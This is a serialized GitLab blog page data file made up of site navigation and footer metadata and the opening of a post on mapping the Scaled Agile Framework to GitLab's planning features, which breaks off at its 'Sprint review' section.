[{"data":1,"prerenderedAt":1209},["ShallowReactive",2],{"/en-us/blog/":3,"navigation-en-us":21,"banner-en-us":433,"footer-en-us":446,"blogCategories-en-us":658,"relatedBlogPosts-en-us":771,"maineFeaturedPost-en-us":1163,"recentFeaturedPosts-en-us":1168,"recentPosts-en-us":1184},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"seo":8,"content":11,"config":13,"_id":15,"_type":16,"title":7,"_source":17,"_file":18,"_stem":19,"_extension":20},"/en-us/blog","en-us",false,"",{"title":9,"description":10},"Blog | GitLab","Tutorials, product information, expert insights, and more from GitLab to help DevSecOps teams build, test, and deploy secure software faster.",{"title":12},"GitLab Blog",{"template":14},"BlogHome","content:en-us:blog:index.yml","yaml","content","en-us/blog/index.yml","en-us/blog/index","yml",{"_path":22,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"data":23,"_id":429,"_type":16,"title":430,"_source":17,"_file":431,"_stem":432,"_extension":20},"/shared/en-us/main-navigation",{"logo":24,"freeTrial":29,"sales":34,"login":39,"items":44,"search":375,"minimal":406,"duo":420},{"config":25},{"href":26,"dataGaName":27,"dataGaLocation":28},"/","gitlab logo","header",{"text":30,"config":31},"Get free trial",{"href":32,"dataGaName":33,"dataGaLocation":28},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com&glm_content=default-saas-trial/","free trial",{"text":35,"config":36},"Talk to sales",{"href":37,"dataGaName":38,"dataGaLocation":28},"/sales/","sales",{"text":40,"config":41},"Sign in",{"href":42,"dataGaName":43,"dataGaLocation":28},"https://gitlab.com/users/sign_in/","sign in",[45,89,185,190,296,356],{"text":46,"config":47,"cards":49,"footer":72},"Platform",{"dataNavLevelOne":48},"platform",[50,56,64],{"title":46,"description":51,"link":52},"The most comprehensive AI-powered DevSecOps Platform",{"text":53,"config":54},"Explore our 
Platform",{"href":55,"dataGaName":48,"dataGaLocation":28},"/platform/",{"title":57,"description":58,"link":59},"GitLab Duo (AI)","Build software faster with AI at every stage of development",{"text":60,"config":61},"Meet GitLab Duo",{"href":62,"dataGaName":63,"dataGaLocation":28},"/gitlab-duo/","gitlab duo ai",{"title":65,"description":66,"link":67},"Why GitLab","10 reasons why Enterprises choose GitLab",{"text":68,"config":69},"Learn more",{"href":70,"dataGaName":71,"dataGaLocation":28},"/why-gitlab/","why gitlab",{"title":73,"items":74},"Get started with",[75,80,85],{"text":76,"config":77},"Platform Engineering",{"href":78,"dataGaName":79,"dataGaLocation":28},"/solutions/platform-engineering/","platform engineering",{"text":81,"config":82},"Developer Experience",{"href":83,"dataGaName":84,"dataGaLocation":28},"/developer-experience/","Developer experience",{"text":86,"config":87},"MLOps",{"href":88,"dataGaName":86,"dataGaLocation":28},"/topics/devops/the-role-of-ai-in-devops/",{"text":90,"left":91,"config":92,"link":94,"lists":98,"footer":167},"Product",true,{"dataNavLevelOne":93},"solutions",{"text":95,"config":96},"View all Solutions",{"href":97,"dataGaName":93,"dataGaLocation":28},"/solutions/",[99,124,146],{"title":100,"description":101,"link":102,"items":107},"Automation","CI/CD and automation to accelerate deployment",{"config":103},{"icon":104,"href":105,"dataGaName":106,"dataGaLocation":28},"AutomatedCodeAlt","/solutions/delivery-automation/","automated software delivery",[108,112,116,120],{"text":109,"config":110},"CI/CD",{"href":111,"dataGaLocation":28,"dataGaName":109},"/solutions/continuous-integration/",{"text":113,"config":114},"AI-Assisted Development",{"href":62,"dataGaLocation":28,"dataGaName":115},"AI assisted development",{"text":117,"config":118},"Source Code Management",{"href":119,"dataGaLocation":28,"dataGaName":117},"/solutions/source-code-management/",{"text":121,"config":122},"Automated Software 
Delivery",{"href":105,"dataGaLocation":28,"dataGaName":123},"Automated software delivery",{"title":125,"description":126,"link":127,"items":132},"Security","Deliver code faster without compromising security",{"config":128},{"href":129,"dataGaName":130,"dataGaLocation":28,"icon":131},"/solutions/security-compliance/","security and compliance","ShieldCheckLight",[133,136,141],{"text":134,"config":135},"Security & Compliance",{"href":129,"dataGaLocation":28,"dataGaName":134},{"text":137,"config":138},"Software Supply Chain Security",{"href":139,"dataGaLocation":28,"dataGaName":140},"/solutions/supply-chain/","Software supply chain security",{"text":142,"config":143},"Compliance & Governance",{"href":144,"dataGaLocation":28,"dataGaName":145},"/solutions/continuous-software-compliance/","Compliance and governance",{"title":147,"link":148,"items":153},"Measurement",{"config":149},{"icon":150,"href":151,"dataGaName":152,"dataGaLocation":28},"DigitalTransformation","/solutions/visibility-measurement/","visibility and measurement",[154,158,162],{"text":155,"config":156},"Visibility & Measurement",{"href":151,"dataGaLocation":28,"dataGaName":157},"Visibility and Measurement",{"text":159,"config":160},"Value Stream Management",{"href":161,"dataGaLocation":28,"dataGaName":159},"/solutions/value-stream-management/",{"text":163,"config":164},"Analytics & Insights",{"href":165,"dataGaLocation":28,"dataGaName":166},"/solutions/analytics-and-insights/","Analytics and insights",{"title":168,"items":169},"GitLab for",[170,175,180],{"text":171,"config":172},"Enterprise",{"href":173,"dataGaLocation":28,"dataGaName":174},"/enterprise/","enterprise",{"text":176,"config":177},"Small Business",{"href":178,"dataGaLocation":28,"dataGaName":179},"/small-business/","small business",{"text":181,"config":182},"Public Sector",{"href":183,"dataGaLocation":28,"dataGaName":184},"/solutions/public-sector/","public 
sector",{"text":186,"config":187},"Pricing",{"href":188,"dataGaName":189,"dataGaLocation":28,"dataNavLevelOne":189},"/pricing/","pricing",{"text":191,"config":192,"link":194,"lists":198,"feature":283},"Resources",{"dataNavLevelOne":193},"resources",{"text":195,"config":196},"View all resources",{"href":197,"dataGaName":193,"dataGaLocation":28},"/resources/",[199,232,255],{"title":200,"items":201},"Getting started",[202,207,212,217,222,227],{"text":203,"config":204},"Install",{"href":205,"dataGaName":206,"dataGaLocation":28},"/install/","install",{"text":208,"config":209},"Quick start guides",{"href":210,"dataGaName":211,"dataGaLocation":28},"/get-started/","quick setup checklists",{"text":213,"config":214},"Learn",{"href":215,"dataGaLocation":28,"dataGaName":216},"https://university.gitlab.com/","learn",{"text":218,"config":219},"Product documentation",{"href":220,"dataGaName":221,"dataGaLocation":28},"https://docs.gitlab.com/","product documentation",{"text":223,"config":224},"Best practice videos",{"href":225,"dataGaName":226,"dataGaLocation":28},"/getting-started-videos/","best practice videos",{"text":228,"config":229},"Integrations",{"href":230,"dataGaName":231,"dataGaLocation":28},"/integrations/","integrations",{"title":233,"items":234},"Discover",[235,240,245,250],{"text":236,"config":237},"Customer success stories",{"href":238,"dataGaName":239,"dataGaLocation":28},"/customers/","customer success stories",{"text":241,"config":242},"Blog",{"href":243,"dataGaName":244,"dataGaLocation":28},"/blog/","blog",{"text":246,"config":247},"Remote",{"href":248,"dataGaName":249,"dataGaLocation":28},"https://handbook.gitlab.com/handbook/company/culture/all-remote/","remote",{"text":251,"config":252},"TeamOps",{"href":253,"dataGaName":254,"dataGaLocation":28},"/teamops/","teamops",{"title":256,"items":257},"Connect",[258,263,268,273,278],{"text":259,"config":260},"GitLab 
Services",{"href":261,"dataGaName":262,"dataGaLocation":28},"/services/","services",{"text":264,"config":265},"Community",{"href":266,"dataGaName":267,"dataGaLocation":28},"/community/","community",{"text":269,"config":270},"Forum",{"href":271,"dataGaName":272,"dataGaLocation":28},"https://forum.gitlab.com/","forum",{"text":274,"config":275},"Events",{"href":276,"dataGaName":277,"dataGaLocation":28},"/events/","events",{"text":279,"config":280},"Partners",{"href":281,"dataGaName":282,"dataGaLocation":28},"/partners/","partners",{"backgroundColor":284,"textColor":285,"text":286,"image":287,"link":291},"#2f2a6b","#fff","Insights for the future of software development",{"altText":288,"config":289},"the source promo card",{"src":290},"/images/navigation/the-source-promo-card.svg",{"text":292,"config":293},"Read the latest",{"href":294,"dataGaName":295,"dataGaLocation":28},"/the-source/","the source",{"text":297,"config":298,"lists":300},"Company",{"dataNavLevelOne":299},"company",[301],{"items":302},[303,308,314,316,321,326,331,336,341,346,351],{"text":304,"config":305},"About",{"href":306,"dataGaName":307,"dataGaLocation":28},"/company/","about",{"text":309,"config":310,"footerGa":313},"Jobs",{"href":311,"dataGaName":312,"dataGaLocation":28},"/jobs/","jobs",{"dataGaName":312},{"text":274,"config":315},{"href":276,"dataGaName":277,"dataGaLocation":28},{"text":317,"config":318},"Leadership",{"href":319,"dataGaName":320,"dataGaLocation":28},"/company/team/e-group/","leadership",{"text":322,"config":323},"Team",{"href":324,"dataGaName":325,"dataGaLocation":28},"/company/team/","team",{"text":327,"config":328},"Handbook",{"href":329,"dataGaName":330,"dataGaLocation":28},"https://handbook.gitlab.com/","handbook",{"text":332,"config":333},"Investor relations",{"href":334,"dataGaName":335,"dataGaLocation":28},"https://ir.gitlab.com/","investor relations",{"text":337,"config":338},"Trust Center",{"href":339,"dataGaName":340,"dataGaLocation":28},"/security/","trust 
center",{"text":342,"config":343},"AI Transparency Center",{"href":344,"dataGaName":345,"dataGaLocation":28},"/ai-transparency-center/","ai transparency center",{"text":347,"config":348},"Newsletter",{"href":349,"dataGaName":350,"dataGaLocation":28},"/company/contact/","newsletter",{"text":352,"config":353},"Press",{"href":354,"dataGaName":355,"dataGaLocation":28},"/press/","press",{"text":357,"config":358,"lists":359},"Contact us",{"dataNavLevelOne":299},[360],{"items":361},[362,365,370],{"text":35,"config":363},{"href":37,"dataGaName":364,"dataGaLocation":28},"talk to sales",{"text":366,"config":367},"Get help",{"href":368,"dataGaName":369,"dataGaLocation":28},"/support/","get help",{"text":371,"config":372},"Customer portal",{"href":373,"dataGaName":374,"dataGaLocation":28},"https://customers.gitlab.com/customers/sign_in/","customer portal",{"close":376,"login":377,"suggestions":384},"Close",{"text":378,"link":379},"To search repositories and projects, login to",{"text":380,"config":381},"gitlab.com",{"href":42,"dataGaName":382,"dataGaLocation":383},"search login","search",{"text":385,"default":386},"Suggestions",[387,389,393,395,399,403],{"text":57,"config":388},{"href":62,"dataGaName":57,"dataGaLocation":383},{"text":390,"config":391},"Code Suggestions (AI)",{"href":392,"dataGaName":390,"dataGaLocation":383},"/solutions/code-suggestions/",{"text":109,"config":394},{"href":111,"dataGaName":109,"dataGaLocation":383},{"text":396,"config":397},"GitLab on AWS",{"href":398,"dataGaName":396,"dataGaLocation":383},"/partners/technology-partners/aws/",{"text":400,"config":401},"GitLab on Google Cloud",{"href":402,"dataGaName":400,"dataGaLocation":383},"/partners/technology-partners/google-cloud-platform/",{"text":404,"config":405},"Why GitLab?",{"href":70,"dataGaName":404,"dataGaLocation":383},{"freeTrial":407,"mobileIcon":412,"desktopIcon":417},{"text":408,"config":409},"Start free 
trial",{"href":410,"dataGaName":33,"dataGaLocation":411},"https://gitlab.com/-/trials/new/","nav",{"altText":413,"config":414},"Gitlab Icon",{"src":415,"dataGaName":416,"dataGaLocation":411},"/images/brand/gitlab-logo-tanuki.svg","gitlab icon",{"altText":413,"config":418},{"src":419,"dataGaName":416,"dataGaLocation":411},"/images/brand/gitlab-logo-type.svg",{"freeTrial":421,"mobileIcon":425,"desktopIcon":427},{"text":422,"config":423},"Learn more about GitLab Duo",{"href":62,"dataGaName":424,"dataGaLocation":411},"gitlab duo",{"altText":413,"config":426},{"src":415,"dataGaName":416,"dataGaLocation":411},{"altText":413,"config":428},{"src":419,"dataGaName":416,"dataGaLocation":411},"content:shared:en-us:main-navigation.yml","Main Navigation","shared/en-us/main-navigation.yml","shared/en-us/main-navigation",{"_path":434,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":435,"titleMobile":435,"button":436,"config":441,"_id":443,"_type":16,"_source":17,"_file":444,"_stem":445,"_extension":20},"/shared/en-us/banner","GitLab 18 & the next step in intelligent DevSecOps.",{"text":437,"config":438},"Watch now",{"href":439,"dataGaName":440,"dataGaLocation":28},"/eighteen/","gitlab 18 banner",{"layout":442},"release","content:shared:en-us:banner.yml","shared/en-us/banner.yml","shared/en-us/banner",{"_path":447,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"data":448,"_id":654,"_type":16,"title":655,"_source":17,"_file":656,"_stem":657,"_extension":20},"/shared/en-us/main-footer",{"text":449,"source":450,"edit":456,"contribute":461,"config":466,"items":471,"minimal":646},"Git is a trademark of Software Freedom Conservancy and our use of 'GitLab' is under license",{"text":451,"config":452},"View page source",{"href":453,"dataGaName":454,"dataGaLocation":455},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/","page source","footer",{"text":457,"config":458},"Edit this 
page",{"href":459,"dataGaName":460,"dataGaLocation":455},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/content/","web ide",{"text":462,"config":463},"Please contribute",{"href":464,"dataGaName":465,"dataGaLocation":455},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/CONTRIBUTING.md/","please contribute",{"twitter":467,"facebook":468,"youtube":469,"linkedin":470},"https://twitter.com/gitlab","https://www.facebook.com/gitlab","https://www.youtube.com/channel/UCnMGQ8QHMAnVIsI3xJrihhg","https://www.linkedin.com/company/gitlab-com",[472,495,552,581,616],{"title":46,"links":473,"subMenu":478},[474],{"text":475,"config":476},"DevSecOps platform",{"href":55,"dataGaName":477,"dataGaLocation":455},"devsecops platform",[479],{"title":186,"links":480},[481,485,490],{"text":482,"config":483},"View plans",{"href":188,"dataGaName":484,"dataGaLocation":455},"view plans",{"text":486,"config":487},"Why Premium?",{"href":488,"dataGaName":489,"dataGaLocation":455},"/pricing/premium/","why premium",{"text":491,"config":492},"Why Ultimate?",{"href":493,"dataGaName":494,"dataGaLocation":455},"/pricing/ultimate/","why ultimate",{"title":496,"links":497},"Solutions",[498,503,506,508,513,518,522,525,529,534,536,539,542,547],{"text":499,"config":500},"Digital transformation",{"href":501,"dataGaName":502,"dataGaLocation":455},"/solutions/digital-transformation/","digital transformation",{"text":134,"config":504},{"href":129,"dataGaName":505,"dataGaLocation":455},"security & compliance",{"text":123,"config":507},{"href":105,"dataGaName":106,"dataGaLocation":455},{"text":509,"config":510},"Agile development",{"href":511,"dataGaName":512,"dataGaLocation":455},"/solutions/agile-delivery/","agile delivery",{"text":514,"config":515},"Cloud transformation",{"href":516,"dataGaName":517,"dataGaLocation":455},"/topics/cloud-native/","cloud 
transformation",{"text":519,"config":520},"SCM",{"href":119,"dataGaName":521,"dataGaLocation":455},"source code management",{"text":109,"config":523},{"href":111,"dataGaName":524,"dataGaLocation":455},"continuous integration & delivery",{"text":526,"config":527},"Value stream management",{"href":161,"dataGaName":528,"dataGaLocation":455},"value stream management",{"text":530,"config":531},"GitOps",{"href":532,"dataGaName":533,"dataGaLocation":455},"/solutions/gitops/","gitops",{"text":171,"config":535},{"href":173,"dataGaName":174,"dataGaLocation":455},{"text":537,"config":538},"Small business",{"href":178,"dataGaName":179,"dataGaLocation":455},{"text":540,"config":541},"Public sector",{"href":183,"dataGaName":184,"dataGaLocation":455},{"text":543,"config":544},"Education",{"href":545,"dataGaName":546,"dataGaLocation":455},"/solutions/education/","education",{"text":548,"config":549},"Financial services",{"href":550,"dataGaName":551,"dataGaLocation":455},"/solutions/finance/","financial 
services",{"title":191,"links":553},[554,556,558,560,563,565,567,569,571,573,575,577,579],{"text":203,"config":555},{"href":205,"dataGaName":206,"dataGaLocation":455},{"text":208,"config":557},{"href":210,"dataGaName":211,"dataGaLocation":455},{"text":213,"config":559},{"href":215,"dataGaName":216,"dataGaLocation":455},{"text":218,"config":561},{"href":220,"dataGaName":562,"dataGaLocation":455},"docs",{"text":241,"config":564},{"href":243,"dataGaName":244,"dataGaLocation":455},{"text":236,"config":566},{"href":238,"dataGaName":239,"dataGaLocation":455},{"text":246,"config":568},{"href":248,"dataGaName":249,"dataGaLocation":455},{"text":259,"config":570},{"href":261,"dataGaName":262,"dataGaLocation":455},{"text":251,"config":572},{"href":253,"dataGaName":254,"dataGaLocation":455},{"text":264,"config":574},{"href":266,"dataGaName":267,"dataGaLocation":455},{"text":269,"config":576},{"href":271,"dataGaName":272,"dataGaLocation":455},{"text":274,"config":578},{"href":276,"dataGaName":277,"dataGaLocation":455},{"text":279,"config":580},{"href":281,"dataGaName":282,"dataGaLocation":455},{"title":297,"links":582},[583,585,587,589,591,593,595,600,605,607,609,611],{"text":304,"config":584},{"href":306,"dataGaName":299,"dataGaLocation":455},{"text":309,"config":586},{"href":311,"dataGaName":312,"dataGaLocation":455},{"text":317,"config":588},{"href":319,"dataGaName":320,"dataGaLocation":455},{"text":322,"config":590},{"href":324,"dataGaName":325,"dataGaLocation":455},{"text":327,"config":592},{"href":329,"dataGaName":330,"dataGaLocation":455},{"text":332,"config":594},{"href":334,"dataGaName":335,"dataGaLocation":455},{"text":596,"config":597},"Environmental, social and governance (ESG)",{"href":598,"dataGaName":599,"dataGaLocation":455},"/environmental-social-governance/","environmental, social and governance",{"text":601,"config":602},"Diversity, inclusion and belonging (DIB)",{"href":603,"dataGaName":604,"dataGaLocation":455},"/diversity-inclusion-belonging/","Diversity, 
inclusion and belonging",{"text":337,"config":606},{"href":339,"dataGaName":340,"dataGaLocation":455},{"text":347,"config":608},{"href":349,"dataGaName":350,"dataGaLocation":455},{"text":352,"config":610},{"href":354,"dataGaName":355,"dataGaLocation":455},{"text":612,"config":613},"Modern Slavery Transparency Statement",{"href":614,"dataGaName":615,"dataGaLocation":455},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency statement",{"title":617,"links":618},"Contact Us",[619,622,624,626,631,636,641],{"text":620,"config":621},"Contact an expert",{"href":37,"dataGaName":38,"dataGaLocation":455},{"text":366,"config":623},{"href":368,"dataGaName":369,"dataGaLocation":455},{"text":371,"config":625},{"href":373,"dataGaName":374,"dataGaLocation":455},{"text":627,"config":628},"Status",{"href":629,"dataGaName":630,"dataGaLocation":455},"https://status.gitlab.com/","status",{"text":632,"config":633},"Terms of use",{"href":634,"dataGaName":635,"dataGaLocation":455},"/terms/","terms of use",{"text":637,"config":638},"Privacy statement",{"href":639,"dataGaName":640,"dataGaLocation":455},"/privacy/","privacy statement",{"text":642,"config":643},"Cookie preferences",{"dataGaName":644,"dataGaLocation":455,"id":645,"isOneTrustButton":91},"cookie preferences","ot-sdk-btn",{"items":647},[648,650,652],{"text":632,"config":649},{"href":634,"dataGaName":635,"dataGaLocation":455},{"text":637,"config":651},{"href":639,"dataGaName":640,"dataGaLocation":455},{"text":642,"config":653},{"dataGaName":644,"dataGaLocation":455,"id":645,"isOneTrustButton":91},"content:shared:en-us:main-footer.yml","Main 
Footer","shared/en-us/main-footer.yml","shared/en-us/main-footer",[659,672,684,695,706,718,729,740,751,761],{"_path":660,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":662,"content":665,"config":666,"_id":669,"_type":16,"title":663,"_source":17,"_file":670,"_stem":671,"_extension":20},"/en-us/blog/categories/agile-planning","categories",{"title":663,"description":664},"Agile Planning","Browse articles related to Agile Planning on the GitLab Blog",{"name":663},{"template":667,"slug":668,"hide":6},"BlogCategory","agile-planning","content:en-us:blog:categories:agile-planning.yml","en-us/blog/categories/agile-planning.yml","en-us/blog/categories/agile-planning",{"_path":673,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":674,"content":677,"config":678,"_id":680,"_type":16,"title":681,"_source":17,"_file":682,"_stem":683,"_extension":20},"/en-us/blog/categories/ai-ml",{"title":675,"description":676},"AI/ML","Browse articles related to AI/ML on the GitLab Blog",{"name":675},{"template":667,"slug":679,"hide":6},"ai-ml","content:en-us:blog:categories:ai-ml.yml","Ai Ml","en-us/blog/categories/ai-ml.yml","en-us/blog/categories/ai-ml",{"_path":685,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":686,"content":689,"config":690,"_id":692,"_type":16,"title":687,"_source":17,"_file":693,"_stem":694,"_extension":20},"/en-us/blog/categories/bulletin-board",{"title":687,"description":688},"Bulletin Board","Browse articles related to Bulletin Board on the GitLab Blog",{"name":687},{"template":667,"slug":691,"hide":6},"bulletin-board","content:en-us:blog:categories:bulletin-board.yml","en-us/blog/categories/bulletin-board.yml","en-us/blog/categories/bulletin-board",{"_path":696,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":697,"content":700,"config":701,"_id":703,"_type":16,"title":698,"_source":17,"_file":704,"_stem":705,"_extension":20},"/en-us/blog/categories/customer-stories",{"title":698,"description":699},"Customer Stories","Browse articles related to 
Customer Stories on the GitLab Blog",{"name":698},{"template":667,"slug":702,"hide":6},"customer-stories","content:en-us:blog:categories:customer-stories.yml","en-us/blog/categories/customer-stories.yml","en-us/blog/categories/customer-stories",{"_path":707,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":708,"content":711,"config":712,"_id":714,"_type":16,"title":715,"_source":17,"_file":716,"_stem":717,"_extension":20},"/en-us/blog/categories/devsecops",{"title":709,"description":710},"DevSecOps","Browse articles related to DevSecOps on the GitLab Blog",{"name":709},{"template":667,"slug":713,"hide":6},"devsecops","content:en-us:blog:categories:devsecops.yml","Devsecops","en-us/blog/categories/devsecops.yml","en-us/blog/categories/devsecops",{"_path":719,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":720,"content":723,"config":724,"_id":726,"_type":16,"title":721,"_source":17,"_file":727,"_stem":728,"_extension":20},"/en-us/blog/categories/engineering",{"title":721,"description":722},"Engineering","Browse articles related to Engineering on the GitLab Blog",{"name":721},{"template":667,"slug":725,"hide":6},"engineering","content:en-us:blog:categories:engineering.yml","en-us/blog/categories/engineering.yml","en-us/blog/categories/engineering",{"_path":730,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":731,"content":734,"config":735,"_id":737,"_type":16,"title":732,"_source":17,"_file":738,"_stem":739,"_extension":20},"/en-us/blog/categories/news",{"title":732,"description":733},"News","Browse articles related to News on the GitLab Blog",{"name":732},{"template":667,"slug":736,"hide":6},"news","content:en-us:blog:categories:news.yml","en-us/blog/categories/news.yml","en-us/blog/categories/news",{"_path":741,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":742,"content":745,"config":746,"_id":748,"_type":16,"title":743,"_source":17,"_file":749,"_stem":750,"_extension":20},"/en-us/blog/categories/open-source",{"title":743,"description":744},"Open 
Source","Browse articles related to Open Source on the GitLab Blog",{"name":743},{"template":667,"slug":747,"hide":6},"open-source","content:en-us:blog:categories:open-source.yml","en-us/blog/categories/open-source.yml","en-us/blog/categories/open-source",{"_path":752,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":753,"content":755,"config":756,"_id":758,"_type":16,"title":90,"_source":17,"_file":759,"_stem":760,"_extension":20},"/en-us/blog/categories/product",{"title":90,"description":754},"Browse articles related to Product on the GitLab Blog",{"name":90},{"template":667,"slug":757,"hide":6},"product","content:en-us:blog:categories:product.yml","en-us/blog/categories/product.yml","en-us/blog/categories/product",{"_path":762,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":763,"content":765,"config":766,"_id":768,"_type":16,"title":125,"_source":17,"_file":769,"_stem":770,"_extension":20},"/en-us/blog/categories/security",{"title":125,"description":764},"Browse articles related to Security on the GitLab Blog",{"name":125},{"template":667,"slug":767,"hide":6},"security","content:en-us:blog:categories:security.yml","en-us/blog/categories/security.yml","en-us/blog/categories/security",[772,813,851,887,928,970,1009,1047,1084,1123],{"category":663,"slug":668,"posts":773},[774,790,802],{"content":775,"config":787},{"title":776,"description":777,"authors":778,"heroImage":780,"date":781,"body":782,"category":668,"tags":783},"SAFe without silos in GitLab","Learn how to map the Scaled Agile Framework to the native capabilities of the DevSecOps platform and the advantages that come from doing so.",[779],"Amanda Rueda","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097569/Blog/Hero%20Images/Blog/Hero%20Images/blog-image-template-1800x945%20%2811%29_2hcwWx49wQ7CHfvhhkVH6S_1750097569126.png","2025-04-08","Let's talk about what happens when your organization adopts the Scaled Agile Framework (SAFe) to scale to enterprise levels. 
You've got multiple teams working on complex products, and you need a way to coordinate all that work. But here's a common headache: Your planning happens in one tool, while your actual development work lives somewhere else entirely.\n\nThis divide creates real problems day-to-day. Developers jump between systems constantly. Product managers struggle to get an accurate picture of progress. And everyone wastes time manually copying information from one place to another. It's precisely the kind of disjointed experience that SAFe was designed to eliminate.\n\nWhile your development teams might already be using GitLab for source code management, CI/CD, and security, you may wonder whether GitLab can also support your planning needs within the SAFe framework. The good news is that GitLab's Agile project management capabilities offer strong support for SAFe, in this article, you'll learn how GitLab maps to SAFe concepts and ceremonies, all within the same DevSecOps platform your software developers already know and love.\n\n## What is SAFe?\n\nSAFe, or the Scaled Agile Framework, is a way to bring Agile principles to large organizations without losing speed, alignment, or customer focus. It takes the iterative and flexible teamwork model of small teams and applies its principles across big organizations that have multiple teams, roadmaps, and stakeholders. This brings the organization into alignment, all planning and executing in the same direction. For product managers, SAFe helps connect strategy to execution so you’re not just shipping fast, you’re shipping the right things, backed by clear priorities and cross-team alignment.\n\nSAFe reduces silos, encourages collaboration, and helps teams rally around customer outcomes, not just tasks. 
When integrated in GitLab, the magic really happens: visibility, traceability, and delivery all live in one place.\n\n## SAFe terminology in GitLab\n\nFirst, let's establish how SAFe concepts map to GitLab:\n\n| SAFe | GitLab |\n| :---- | :---- |\n| Epic | Top-level Epic |\n| Capability | Sub-epic (Level 1) |\n| Feature | Sub-epic (Level 2) |\n| User Story | Issue |\n| Task | Task |\n| Team | Custom Field / Scoped Label |\n| Sprint | Iteration |\n| Program Increment (PI) | Milestone |\n| Value Stream | Top-level Group |\n| Agile Release Train (ART) | Top-level Group |\n\n\u003Cbr>\u003C/br>\n\nWith this mapping as your guide, you can set up GitLab to mirror your SAFe implementation. The group structure lets you organize around your value streams and ARTs, while the work item hierarchy (with up to seven levels of nested epics!) gives you all the depth you need for complex product portfolios. Whether you're working at the portfolio level (with top-level groups), program level (with subgroups), or team level (with projects), GitLab's organizational structure aligns perfectly with SAFe's hierarchy.\n\n## Supporting SAFe ceremonies in GitLab\n\nNow for the fun part - how do you actually run your SAFe ceremonies in GitLab? Let's walk through each one.\n\n### PI planning\n\nTo facilitate the cross-team alignment and dependency management that makes PI planning successful, GitLab offers several capabilities:\n\n* Use the [Roadmap](https://docs.gitlab.com/user/group/roadmap/) view to visualize features across teams and time periods\n* Assign features to the PI [milestone](https://docs.gitlab.com/user/project/milestones/)\n* Document and visualize cross-team [dependencies](https://docs.gitlab.com/user/project/issues/related_issues/#blocking-issues) as they're identified\n\nGitLab gives you flexibility for PI planning through both the Epic boards (which can be configured to show team assignments) and the Roadmap view (which shows features over time like a Gantt chart). 
You can switch between these views during your planning session depending on whether you're focusing on the timeline or team organization.\n\n![Roadmap view and epic board](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097577/Blog/Content%20Images/Blog/Content%20Images/image3_aHR0cHM6_1750097576746.gif)\n\n\u003Cbr>\u003C/br>\n\n![Roadmap view with Gantt chart](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097577/Blog/Content%20Images/Blog/Content%20Images/image5_aHR0cHM6_1750097576747.png)\n\n### Refinement\n\nAs a product manager, running effective refinement sessions means having clear visibility into your feature backlog. You can run your refinement session right inside GitLab. No more updating one tool during the meeting and then having to update another tool afterward.\n\nGitLab powers refinement sessions with:\n\n* [Epic boards](https://docs.gitlab.com/user/group/epics/epic_boards/) that group features based on status\n* The ability to view story points directly in the [overview](https://docs.gitlab.com/user/group/epics/epic_boards/#view-count-of-issues-weight-and-progress-of-an-epic)\n* Comprehensive [drawer views](https://docs.gitlab.com/user/group/epics/manage_epics/#open-epics-in-a-drawer) that let you interact with work items without losing context\n* The ability to create and link [child issues](https://docs.gitlab.com/user/group/epics/manage_epics/#add-an-issue-to-an-epic) directly from epics\n\n![SAFe - image 3](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097577/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750097576749.gif)\n\n### Sprint planning\n\nWhen it's time to figure out what your team can tackle in the next sprint, GitLab gives you:\n\n* [Issue boards](https://docs.gitlab.com/user/project/issue_board/) that provide a comprehensive view of your backlog\n* [Total weight](https://docs.gitlab.com/user/project/issue_board/#sum-of-issue-weights) of user stories displayed directly on 
boards\n* The ability to easily move issues between iterations\n* A collapsible view that simplifies moving stories between sprints\n\nThis means you can keep everything in one place and spend your planning meetings actually planning instead of jumping between tools.\n\n![Sprint planning with GitLab](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097577/Blog/Content%20Images/Blog/Content%20Images/image4_aHR0cHM6_1750097576751.gif)\n\n*💡 Check out [this tutorial on using GitLab to facilitate Scrum](https://docs.gitlab.com/tutorials/scrum_events/) for a detailed glimpse into the power of GitLab in Agile planning and sprint tracking.*\n\n### Daily stand-ups\n\nYour team can gather around the board during daily stand-ups and actually see what everyone's working on, what's stuck, and what's ready for review – all in one view. For your dev team's daily stand-ups, GitLab lets you:\n\n* Create [iteration-scoped](https://docs.gitlab.com/user/project/issue_board/#iteration-lists) boards that show the current sprint's work\n* Display story points/weights directly on cards\n* Use the [drawer view](https://docs.gitlab.com/user/project/issues/managing_issues/#open-issues-in-a-drawer) to access details without leaving the context\n* Highlight tasks at risk through [health status](https://docs.gitlab.com/user/project/issues/managing_issues/#health-status)\n\n![Daily stand-up board](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097577/Blog/Content%20Images/Blog/Content%20Images/image6_aHR0cHM6_1750097576755.png)\n\n### Sprint review\n\nWant to know how your team is doing over time? 
